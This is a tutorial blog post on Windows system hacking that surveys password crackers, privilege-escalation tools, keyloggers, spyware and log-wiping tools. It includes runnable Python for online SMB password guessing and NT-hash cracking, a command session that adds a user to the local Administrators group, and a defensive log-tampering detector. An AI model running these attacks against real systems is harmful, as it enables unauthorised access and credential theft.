Password Cracking, Escalating Privileges and Hiding Files

System hacking has several aspects. As we recall from the earlier topic, "Gathering Network and Host Information: Scanning and Enumeration", the system hacking cycle consists of six steps. The first step, enumeration, was discussed in that topic. This TechTrick covers the five remaining steps:

  • Cracking passwords
  • Escalating privileges
  • Executing applications
  • Hiding files
  • Covering tracks

The Simplest Way to Get a Password

Many hacking attempts start with obtaining a password to the target system. Passwords are the key piece of information needed to access a system, and users often select passwords that are easy to guess. Many reuse passwords or choose something simple, such as a pet's name, to help them remember it. Because of this human factor, password guessing often succeeds when some information is known about the target. Information gathering and reconnaissance can reveal details that help a hacker guess a user's password.

Once a password is guessed or cracked, it can be the launching point for escalating privileges, executing applications, hiding files, and covering tracks. If guessing a password fails, passwords may be cracked manually or with automated tools using a dictionary or brute-force method.

Types of Passwords

Several types of passwords are used to provide access to systems. The characters that form a password can fall into any of these categories:

  • Passwords that contain only letters.
  • Passwords that contain only numbers.
  • Passwords that contain only special characters.
  • Passwords that contain letters and numbers.
  • Passwords that contain letters and special characters.
  • Passwords that contain special characters and numbers.
  • Passwords that contain letters, special characters and numbers.

The larger the character set a password draws from, the larger the keyspace a brute-force attack has to cover, which is why the last category is the hardest to crack.

Administrator Password Guessing

  • Assuming that TCP port 139 (the NetBIOS session service) is open, the most effective method of breaking into NT/2000 is password guessing.
  • Attempt to connect to an enumerated share (IPC$ or C$) with a username/password pair.
  • The default ADMIN$, C$ and %SystemDrive% shares are a good starting point, and the built-in Administrator account is the usual target because the default account-lockout policy does not apply to it.
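The guessing loop described above, as an added example that is not from TechTrick or from any of the tools it lists. The `net use` syntax and the Windows system error codes it reports (1326 logon failure, 1909 account locked out, 53 network path not found) are real; the target host in the demo is a constructed stand-in so the script runs offline, and `live_attempt` is the hypothetical hook that would run the real command on a Windows box.

```python
"""Online password guessing against an SMB share via `net use`, with a lockout guard.

Added example; the target host and its replies below are a constructed stand-in.
"""
import re
import subprocess
from typing import Callable, Iterable, List, Optional

# System error codes that `net use` reports as "System error NNNN has occurred."
ERROR_BAD_NETPATH = 53           # host or share not reachable
ERROR_LOGON_FAILURE = 1326       # unknown user name or bad password
ERROR_ACCOUNT_LOCKED_OUT = 1909  # account lockout threshold reached


def net_use_command(target: str, share: str, user: str, password: str) -> List[str]:
    """Build argv for one guess: net use \\\\TARGET\\SHARE <password> /user:TARGET\\<user>."""
    return ["net", "use", f"\\\\{target}\\{share}", password, f"/user:{target}\\{user}"]


def parse_net_use(output: str) -> str:
    """Classify `net use` output as success, bad-password, locked-out, unreachable or other."""
    if "completed successfully" in output.lower():
        return "success"
    match = re.search(r"System error (\d+)", output)
    code = int(match.group(1)) if match else None
    return {
        ERROR_LOGON_FAILURE: "bad-password",
        ERROR_ACCOUNT_LOCKED_OUT: "locked-out",
        ERROR_BAD_NETPATH: "unreachable",
    }.get(code, "other")


def guess_online(attempt: Callable[[str], str], candidates: Iterable[str],
                 max_attempts: int) -> Optional[str]:
    """Try candidates in rank order (most likely first); return the password that works.

    Stops on success, on lockout, on an unreachable host, and after max_attempts so the
    run stays under the target's lockout threshold. Every attempt is a live logon and
    produces a failed-logon audit event on the target when logon auditing is enabled.
    """
    for n, password in enumerate(candidates, start=1):
        if n > max_attempts:
            return None
        outcome = parse_net_use(attempt(password))
        if outcome == "success":
            return password
        if outcome in ("locked-out", "unreachable"):
            return None
    return None


def live_attempt(target: str, share: str = "IPC$",
                 user: str = "Administrator") -> Callable[[str], str]:
    """Hypothetical hook that runs the real command (Windows only); the demo does not call it."""
    def attempt(password: str) -> str:
        proc = subprocess.run(net_use_command(target, share, user, password),
                              capture_output=True, text=True)
        return proc.stdout + proc.stderr
    return attempt


def fake_host(real_password: str, lockout_threshold: int) -> Callable[[str], str]:
    """Constructed stand-in for a target that locks the account after N bad guesses."""
    failures = 0

    def attempt(password: str) -> str:
        nonlocal failures
        if failures >= lockout_threshold:      # a locked account rejects even the right password
            return "System error 1909 has occurred.\r\n\r\nThe referenced account is currently locked out.\r\n"
        if password == real_password:
            return "The command completed successfully.\r\n"
        failures += 1
        return "System error 1326 has occurred.\r\n\r\nThe user name or password is incorrect.\r\n"
    return attempt


# Guesses ranked from recon, most likely first (constructed): pet name, site name, then defaults.
RANKED_GUESSES = ["fluffy", "fluffy1", "techtrick", "password", "admin", "letmein"]

if __name__ == "__main__":
    print(guess_online(fake_host("fluffy1", lockout_threshold=5), RANKED_GUESSES, max_attempts=5))
```

The attempt budget is the part worth copying: an online guess either lands in the first handful of ranked candidates or it locks the account and announces itself in the Security log, which is why the sections that follow move to sniffing and offline cracking.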

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then use them to gain access? Note that an SMB logon is a challenge-response exchange (LM/NTLM), so what is captured is not the password itself: the capture is either cracked offline (the approach L0phtCrack takes) or relayed to another host while the exchange is in progress (the approach SMBRelay takes), rather than replayed verbatim.


Cracking a Password

Manual password cracking involves attempting to log on with different passwords. The hacker follows these steps:

  • Find a valid user account (such as Administrator or Guest).
  • Create a list of possible passwords.
  • Rank the passwords from high to low probability.
  • Key in each password.
  • Try again until a successful password is found.

A hacker can also write a script that tries each password in a list. This is still considered manual cracking; it is time consuming and not usually effective, because every attempt is a live logon that can trigger account lockout and, when logon auditing is enabled, leaves a failed-logon event in the Security log.

Hacking Tool: L0phtCrack

L0phtCrack is a password auditing and recovery package originally from L0pht Heavy Industries, later distributed by @stake, which was acquired by Symantec. It performs Server Message Block (SMB) packet captures on the local network segment and extracts the individual logon sessions. L0phtCrack contains dictionary, brute-force, and hybrid attack capabilities. Symantec discontinued the tool in 2006; its original authors later reacquired it and released L0phtCrack 6 in 2009, and older versions can still be found on the Internet.

With L0phtCrack's cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator status in a matter of days.


Hacking Tool: KerbCrack

KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logons. The cracker then recovers passwords from the capture file using a brute-force or dictionary attack.


Hacking Tool: Legion

Legion automates password guessing over NetBIOS sessions. It scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.

Hacking Tool: NTInfoScan

NTInfoScan is a security scanner for Windows NT 4.0. This vulnerability scanner produces an HTML report of the security issues found on the target system, along with other information about it.

Hacking Tool: LC5

LC5 is version 5 of L0phtCrack, another good password cracking tool and a suitable replacement for the earlier L0phtCrack releases.

Privilege Escalation

If an attacker gains access to the network using a non-administrative user account, the next step is to raise that access to the level of an administrator.

This is called privilege escalation.

Hacking Tool: GetAdmin

1. GetAdmin.exe is a small program that adds a user to the local Administrators group.

2. It uses a low-level NT kernel routine to set a global flag that allows access to any running process.

3. You need to log on at the server console to execute the program.

4. GetAdmin.exe is run from the command line or from a browser.

5. It only works on Windows NT 4.0 up to Service Pack 3; the flaw was closed by a post-SP3 hotfix.

Hacking Tool: hk.exe

1. The hk.exe utility exploits a Local Procedure Call (LPC) flaw in NT.

2. A non-admin user can be added to the Administrators group using hk.exe, as the following session shows. The plain net command fails because the caller is not an administrator; hk runs the same command after impersonating a privileged LPC client (the NtImpersonateClientOfPort call in its output), so it succeeds:

   c:\>net localgroup administrators akash /add
   Access denied.

   c:\>hk net localgroup administrators akash /add
   pid & tid are: 47 - 48
   NtImpersonateClientOfPort succeeded

Types of Password Attacks

  • Dictionary attack
  • Brute force attack
  • Hybrid attack
  • Social engineering
  • Shoulder surfing
  • Dumpster diving
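The first three attack types in this list, the manual cracking steps described earlier and the dictionary/brute-force/hybrid modes that L0phtCrack automates all come down to the same loop, shown here as an added example that is not from TechTrick or from any of the tools named on this page: a pure-Python NT-hash cracker (MD4 of the UTF-16LE password, which is how the SAM stores the NT hash) that runs a dictionary attack, a hybrid attack (dictionary words with capitalisation and a numeric suffix) and a plain brute-force attack in increasing cost order. The word list, the character set and the target passwords are constructed for the demonstration; MD4 is implemented inline because hashlib's md4 is usually unavailable under OpenSSL 3.

```python
"""Dictionary, hybrid and brute-force attacks against NT hashes (MD4 of the UTF-16LE password).

Added example; the word list, character set and target passwords are constructed.
"""
import itertools
import struct
from typing import List, Optional, Tuple

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    x &= _MASK
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 as in RFC 1320, inline because hashlib's md4 is usually missing under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"                      # padding: 0x80, zeros, 64-bit bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [(i % 4) * 4 + i // 4 for i in range(16)]       # word order for round 2
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]  # word order for round 3
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):
            a = _rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + G(b, c, d) + X[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & _MASK, (B + b) & _MASK, (C + c) & _MASK, (D + d) & _MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """The NT hash as stored in the SAM: unsalted MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def dictionary_attack(target: str, wordlist: List[str]) -> Optional[str]:
    """Hash each word as-is and compare with the target."""
    return next((w for w in wordlist if nt_hash(w) == target), None)


def hybrid_attack(target: str, wordlist: List[str], max_suffix: int = 99) -> Optional[str]:
    """Dictionary words with cheap mutations: capitalisation and a numeric suffix."""
    suffixes = [""] + [str(n) for n in range(max_suffix + 1)]
    for word in wordlist:
        for base in (word, word.capitalize()):
            for suffix in suffixes:
                if nt_hash(base + suffix) == target:
                    return base + suffix
    return None


def brute_force_attack(target: str, charset: str, max_len: int) -> Optional[str]:
    """Every string over charset up to max_len; the keyspace grows as len(charset) ** length."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if nt_hash(candidate) == target:
                return candidate
    return None


def crack(target: str, wordlist: List[str], charset: str, max_len: int) -> Optional[Tuple[str, str]]:
    """Run the attacks cheapest first; return (method, password) or None if all of them fail."""
    attacks = (("dictionary", lambda: dictionary_attack(target, wordlist)),
               ("hybrid", lambda: hybrid_attack(target, wordlist)),
               ("brute-force", lambda: brute_force_attack(target, charset, max_len)))
    for name, run in attacks:
        found = run()
        if found is not None:
            return name, found
    return None


WORDLIST = ["admin", "letmein", "fluffy", "password"]   # constructed stand-in for a real word list
CHARSET = "abc123"                                        # constructed, tiny on purpose

if __name__ == "__main__":
    for secret in ("password", "fluffy12", "c2a", "Zz9!Zz9!"):
        print(secret, "->", crack(nt_hash(secret), WORDLIST, CHARSET, max_len=3))
```

Because the NT hash is unsalted, every candidate hash computed here can be compared against every captured hash at once, and nothing on the target sees the attempts, which is the difference between this and the online guessing loop. LM hashes are not covered: they are DES-based, uppercase the password and split it into two 7-character halves, which is why a cracked LM password comes back case-insensitive.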

Hacking Tool: SMB Grind

SMBGrind speeds up L0phtCrack sessions on sniffer dumps by removing duplicate captures and by providing a way to target specific users without editing the dump files by hand.


Hacking Tool: SMBDie

SMBDie crashes computers running Windows NT/2000/XP by sending a specially crafted SMB request (the denial-of-service flaw patched in MS02-045).

Hacking Tool: NBTDeputy

NBTDeputy registers a NetBIOS computer name on the network and then answers NetBT name-query requests for it.

NBTDeputy thus lets other hosts resolve that NetBIOS computer name to an IP address of the attacker's choosing; it is similar to proxy ARP.

This tool works well with SMBRelay.

For example, SMBRelay runs on a computer as ANONYMOUS-ONE at a given IP address, and NBTDeputy is run so that the name resolves to that address; SMBRelay may then connect to any XP or .NET Server (the pre-release name of Windows Server 2003) host whenever a logged-on user browses "My Network Places".

Hacking Tool: John the Ripper

John the Ripper is a free, very fast command-line tool designed to crack both Unix and NT passwords.

Passwords recovered from LM hashes are case-insensitive, because LM uppercases the password before hashing, so they may not represent the real mixed-case password; the NT hash preserves case.


Hacking Tool: Win32CreateLocalAdminUser

Win32CreateLocalAdminUser is a program that creates a new user whose username and password are both X and adds that user to the local Administrators group. It is part of the Metasploit Project and can be launched from the Metasploit Framework on Windows.

Hacking Tool: Offline NT Password Resetter

Offline NT Password Resetter (the Offline NT Password & Registry Editor, also known as chntpw) is a method of resetting the Administrator account's password while the system is not booted into Windows. The most common method is to boot a Linux CD, mount the NTFS partition, which is no longer protected by the running operating system, and overwrite the account's password hash in the SAM hive; blanking the password is the most reliable choice. Note that this resets rather than recovers the password, so on Windows XP and later any EFS-encrypted files and other DPAPI-protected secrets belonging to that account become inaccessible.

Hacking Tool: Keystroke Loggers

1. If all other attempts to obtain domain credentials fail, a keystroke logger is the solution.

2. Keystroke loggers are stealthy software that hooks the path between the keyboard hardware and the applications that read from it (typically a keyboard filter driver or a keyboard hook), so that every keystroke can be recorded.

3. There are two types of keystroke loggers: software based and hardware based.

Hacking Tool: WinZapper

1. WinZapper is a tool that an attacker can use to erase event records selectively from the Security log in Windows 2000.

2. To use the program, the attacker runs winzapper.exe, marks the event records to be deleted and then presses "Delete events".

3. To sum things up: after an attacker has gained Administrator access to the system, the local Security log simply cannot be trusted. Forwarding events to a separate collector as they are written is the only way to keep a copy the attacker cannot edit afterwards.
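Since the tool rewrites the log in place, the defender's question is whether the editing can be detected from what remains. The following is an added example, not code from TechTrick or from WinZapper, that checks an exported Security log for two traces: holes in the record-number sequence (the Event Log service numbers records consecutively, so a missing run inside one exported file means records that were written are gone, assuming the editor did not renumber the records it left behind) and the "audit log cleared" event (517 on NT 4.0/2000/XP, 1102 on Vista and later), which a full wipe leaves behind but a selective edit does not. The CSV layout and the log lines are constructed; the event IDs are the real ones.

```python
"""Spot traces of Security-log editing in an exported log: record-number gaps and log-cleared events.

Added example; the export format and the log lines below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Tuple

# Security event IDs: 517 = audit log cleared on NT 4.0/2000/XP (1102 on Vista and later),
# 528 = successful logon, 529 = logon failure (unknown user name or bad password).
LOG_CLEARED_IDS = {517, 1102}


@dataclass
class EventRecord:
    record_number: int
    timestamp: datetime
    event_id: int
    user: str


def parse_export(text: str) -> List[EventRecord]:
    """Parse lines of the form record_number,YYYY-MM-DD HH:MM:SS,event_id,user (constructed CSV layout)."""
    records = []
    for line in text.strip().splitlines():
        num, ts, eid, user = (field.strip() for field in line.split(",", 3))
        records.append(EventRecord(int(num), datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(eid), user))
    return records


def find_record_gaps(records: List[EventRecord]) -> List[Tuple[int, int]]:
    """(last_seen, next_seen) pairs wherever record numbers are not consecutive.

    The Event Log service numbers records consecutively within a log, so a hole in one
    exported file means records that were written are no longer there (assumes the
    editor did not renumber the records it left behind).
    """
    ordered = sorted(records, key=lambda r: r.record_number)
    return [(a.record_number, b.record_number)
            for a, b in zip(ordered, ordered[1:]) if b.record_number != a.record_number + 1]


def find_time_reversals(records: List[EventRecord]) -> List[int]:
    """Record numbers whose timestamp precedes the previous record's: the file was rewritten or restored."""
    ordered = sorted(records, key=lambda r: r.record_number)
    return [b.record_number for a, b in zip(ordered, ordered[1:]) if b.timestamp < a.timestamp]


def find_clear_events(records: List[EventRecord]) -> List[int]:
    """Record numbers of 'audit log cleared' events; a wipe is logged, a selective edit is not."""
    return [r.record_number for r in records if r.event_id in LOG_CLEARED_IDS]


def audit_export(text: str) -> Dict[str, list]:
    """Run all three checks over one exported log and return what each one found."""
    records = parse_export(text)
    return {"gaps": find_record_gaps(records),
            "time_reversals": find_time_reversals(records),
            "cleared": find_clear_events(records)}


# Constructed export: two failed Administrator logons survive, but records 1004-1006 are missing.
SAMPLE_EXPORT = """
1001,2003-03-01 08:59:10,528,alice
1002,2003-03-01 09:02:41,529,Administrator
1003,2003-03-01 09:02:55,529,Administrator
1007,2003-03-01 09:30:00,528,alice
1008,2003-03-01 09:31:12,528,bob
"""

if __name__ == "__main__":
    print(audit_export(SAMPLE_EXPORT))
```

Run against an export taken from the compromised host, the gap check tells you that something between records 1003 and 1007 was removed, not what it was; only a copy forwarded to another system before the edit can answer that.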

Hacking Tool: Hardware Key Logger

1. A hardware key logger is a tiny device attached in line between a keyboard and a computer.

2. It keeps a record of every keystroke typed on the keyboard. The recording is completely transparent to the end user, and because nothing runs on the host, software-based scanners will not see it either.

Spyware: Spector

1. Spector is spyware that records everything anyone does on the Internet.

2. Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector you can see exactly what your surveillance targets have been doing online and offline.

3. Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the computer's hard drive.

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security.
